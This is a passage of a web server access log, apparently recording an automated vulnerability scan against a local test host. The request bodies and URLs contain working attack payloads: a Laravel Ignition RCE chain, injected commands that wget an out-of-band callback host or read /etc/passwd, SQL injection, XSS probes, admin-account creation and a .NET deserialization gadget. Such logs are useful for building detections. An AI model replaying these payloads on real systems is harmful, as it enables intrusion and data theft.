\x22cve20213129\x22, \x22viewFile\x22: \x22AA\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=SSQs1E&adminpassword=iwbwJG&adminemail=test@test.com&adminname=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sphinx-graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/49 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /alfresco/api/-default-/public/cmis/versions/1.1/atom HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/50 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"more=0&host=0&username=admin&password=admin&db=&lang=en_us&expire=3","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?action=login.index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"127.0.0.1/index.php?action=login.index", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/targets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aj.html?a=devi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0a/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.197","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi2/status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.192","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"wimToken=&userid_work=&userid=YWRtaW4=&password_work=&password=&open=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.msmtprc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.197","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"\x0D\x0A\x0D\x0A login\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A testing\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A testing\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.194","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"browserTime=081119502020¤tTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.198","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /init.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.194","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;wget http://c9v8hs0smpv8c6ag07h0wjki8f8kjpuxp.oast.online&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_log.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:12 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/login?&err=--%3E%3Cscript%3Ealert('297MbGZn0s73ltZr6aHtsla0uKf')%3C/script%3E%3C!--&lang=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /startup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wfc/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /metrics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PURGE / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"PURGE", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-setup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"type='|cat /etc/passwd||'","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:13 +0000","request_body":"stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVy